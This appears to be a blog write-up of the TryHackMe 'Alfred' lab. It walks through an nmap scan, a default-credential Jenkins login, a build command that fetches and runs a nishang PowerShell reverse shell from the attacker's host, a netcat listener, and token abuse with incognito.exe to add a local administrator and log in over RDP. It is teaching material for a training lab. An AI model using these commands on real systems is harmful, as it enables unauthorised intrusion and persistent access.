Alfred is the second machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
The output of the nmap scan:
nmap -sC -sV 10.10.0.34 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 05:25 EDT Nmap scan report for 10.10.0.34 Host is up (0.053s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site doesn't have a title (text/html). 3389/tcp open ssl/ms-wbt-server? 8080/tcp open http Jetty 9.4.z-SNAPSHOT | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site doesn't have a title (text/html;charset=utf-8). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 92.30 seconds
Jenkins login page.
Jenkins documentation, default credentials should be the
admin:password pair, but this is not the case.
The first option to check is other “default” password pairs.
admin:admin will do the trick this time.
A few words about
Jenkins before we move on:
Jenkins – an open source automation server which enables developers around the world to reliably build, test, and deploy their software.
From the attacker’s perspective, this is a goldmine. First, you can execute system command with it. Second, already created projects and builds might contain a ton of priceless data.
We can see that
Jenkins is already has a build for the project named, well,
Navigate to the configurations of the project:
We are looking for the
Build section of it. You can see that to make a new build,
Jenkins execute a
Windows bash command and running
Let’s replace the
whoami command and download a reverse shell to our
Kali Linux machine.
A common way to do that with the Windows box is to use something like nishang
PowerShell reverse shell.
Simply add the line to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.19.53 -Port 1337
Serve the HTTP server to host that file by executing the following command:
sudo python -m SimpleHTTPServer 80
Prepare a listener on the port
sudo nc -nlvp 1337
We are done with preparations on the
Kali Linux side, let’s modify the
Build command in
whoami with the following:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.19.53/Invoke-PowerShellTcp.ps1')
Build Now and take a break for a second.
Jenkins will make a new build and by doing that, it will also download and execute your reverse shell as a user
Let’s check what privileges the user
whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeDebugPrivilege Debug programs Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled
The official guide is covering only the way how to do it with
Metasploit, but of course, you can do the same without it.
SeImpersonatePrivilege allows you to impersonate a client. We can exploit that to gain privileged access to the local system.
The official guide is also offering you to use the
incognito module for
Metasploit, but you can download it as a stand-alone binary.
incognito.exe to the machine in any preferred way.
If you don’t have one, you can use this
(New-Object System.Net.WebClient).DownloadFile("https://<YOUR_IP>/<FILE_NAME>", "C:\<PATH_TO_THE_FILE><FILE_NAME>")
When you will have your file on the box, you can impersonate
NT AUTHORITY\SYSTEM token as the official guide recommend you, but you could also create a new user with admin rights:
PS C:\users\public\Documents> ./incognito.exe add_user carrotcake SuperSecretPassw0rd123 [-] WARNING: Not running as SYSTEM. Not all tokens will be available. [*] Enumerating tokens [*] Attempting to add user carrotcake to host 127.0.0.1 [+] Successfully added user PS C:\users\public\Documents> ./incognito.exe add_localgroup_user Administrators carrotcake [-] WARNING: Not running as SYSTEM. Not all tokens will be available. [*] Enumerating tokens [*] Attempting to add user carrotcake to local group Administrators on host 127.0.0.1 [+] Successfully added user to local group
Here we are creating a new user
carrotcake with the password
incognito.exe, and then adding this account to the local group
You can now try to login to the box with a new account. We can use
RDP protocol as the port
3389 is open:
rdesktop -u carrotcake -p SuperSecretPassw0rd123 10.10.0.34
OR you can use the tool
Remmina instead of
rdesktop. It has a built-in screenshot taker and works way more stable in my taste.
How to install Remmina
- You don’t have to always look for a way to exploit the service. Sometimes you just need to use it
- Understanding of the environment can help you to achieve your goals
- Creating a new user sometimes might be the easiest way to get persistent access to the system
Do you likes this content?
You can follow me on Twitter to not miss new posts!